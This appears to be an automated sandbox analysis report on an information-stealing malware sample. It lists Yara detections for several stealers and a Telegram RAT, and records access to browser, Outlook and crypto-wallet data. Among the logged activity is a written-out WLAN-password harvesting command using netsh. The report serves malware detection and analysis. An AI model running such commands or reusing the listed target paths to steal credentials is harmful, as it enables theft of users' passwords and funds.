Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\cc\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\cookies\Google Chrome_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\outlook.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\passwords.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\screenshot.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\system.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dll.exe Queries volume information: C:\Users\user\AppData\Local\Temp\dll.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Queries volume information: C:\Users\user\AppData\Local\Temp\chormuim.exe VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the product ID of Windows
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B86D00 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime, 4_2_00B86D00
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B7D6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 4_2_00B7D6E2
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8B1E0 GetUserNameA, 4_2_00B8B1E0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8BEE0 _memset,_memset,GetVersionExA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,FreeLibrary, 4_2_00B8BEE0

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.29.dr Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.29.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: chormuim.exe, 00000008.00000002.409485125.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.373931616.000000001BA2C000.00000004.00000010.sdmp Binary or memory string: r\MsMpeng.exe
Source: chormuim.exe, 00000008.00000000.373226840.000000001B93C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.369711383.0000000000861000.00000004.00000020.sdmp, chormuim.exe, 00000008.00000000.365261466.000000001B93C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.362756816.000000001B900000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000002.409186755.000000001B900000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.366204607.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.372980265.000000001B900000.00000004.00000010.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.29.dr Binary or memory string: procexp.exe

Stealing of Sensitive Information:

Yara detected Redline Clipper
Source: Yara match File source: 12.0.taskshell.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.taskshell.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dll.exe.23a3290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.taskshell.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.taskshell.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.taskshell.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.taskshell.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000000.348480456.0000000000312000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.555072443.0000000000D92000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.555066111.0000000000642000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.330943519.0000000000D92000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.302503110.0000000000642000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.304102093.0000000002341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.555084428.0000000000312000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dll.exe PID: 5360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: taskshell.exe PID: 6056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: taskshell.exe PID: 3132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: taskshell.exe PID: 6772, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\AMD Driver\taskshell.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Yara detected Oski Stealer
Source: Yara match File source: 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match File source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4c0fb62.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2406b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4b5ec00.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4b5ec00.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2406b90.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4c0fb62.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12bfa128.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchoste.exe, type: DROPPED
Yara detected StormKitty Stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Found many strings related to Crypto-Wallets (likely being stolen)
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Electrum-LTC\\wallets\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\ElectronCash\\wallets\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: window-state.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\jaxx\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: exodus.conf.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: info.seco
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: passphrase.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Ethereum\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Ethereum\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: default_wallet
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: multidoge.wallet
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: seed.seco
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Yara detected Credential Stealer
Source: Yara match File source: 00000008.00000000.370467159.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406666147.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.356149280.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Remote Access Functionality:

Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Yara detected Oski Stealer
Source: Yara match File source: 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match File source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4c0fb62.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2406b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4b5ec00.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4b5ec00.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2406b90.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4c0fb62.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12bfa128.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchoste.exe, type: DROPPED
Yara detected StormKitty Stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR